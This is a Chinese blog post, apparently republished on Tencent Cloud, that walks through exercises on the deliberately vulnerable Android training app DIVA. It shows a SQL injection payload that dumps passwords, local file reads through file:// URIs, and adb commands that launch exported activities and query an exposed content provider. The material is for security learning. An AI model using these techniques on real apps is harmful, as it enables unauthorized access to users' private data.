前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Android App漏洞学习(二)

Android App漏洞学习(二)

作者头像
信安之路
发布2018-08-08 11:01:54
6050
发布2018-08-08 11:01:54
举报
文章被收录于专栏:信安之路

接上一篇没写完的文章《Android App漏洞学习(一)》,下面继续剩下的几个部分。

PART 7 不安全的输入1(sqli)

打开日志:

adb logcat

输入一个单引号,在日志中可以看到报错信息,存在sql注入。

输入' or '1'='1,可返回所有用户密码。

PART 8 不安全的输入2(读取本地文件)

可访问本地的任意文件,输入

file:///data/data/jakhar.aseem.diva/shared_prefs/jakhar.aseem.diva_preferences.xml

PART 9 访问控制1(Activity 1)

查看AndroidManifest.xml文件中暴露的activity组件:

利用am(Activity Manager tool)启动暴露的组件,来绕过权限控制:

adb shell am start jakhar.aseem.diva/.APICredsActivity

adb shell am start -n jakhar.aseem.diva/.APICredsActivity -a jakhar.aseem.diva.action.VIEW_CREDS

同时也可以使用drozer来完成:

PART 10 访问控制2(Activity 2)

输入 adb shell am start jakhar.aseem.diva/.APICreds2Activity,并没有出现PART9中的情况,添加了验证PIN码。

PART 11 访问控制3(Content Providers )

查找暴露的Content Providers组件:

然后查找包含content:// 的smali文件。

$ grep -lr “content://” *

查看私有日志内容

$ adb shell content query –uri content://jakhar.aseem.diva.provider.notesprovider/notes

另一种方式:使用drozer:

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2017-08-13,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • PART 7 不安全的输入1(sqli)
  • PART 8 不安全的输入2(读取本地文件)
  • PART 9 访问控制1(Activity 1)
  • PART 10 访问控制2(Activity 2)
  • PART 11 访问控制3(Content Providers )
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档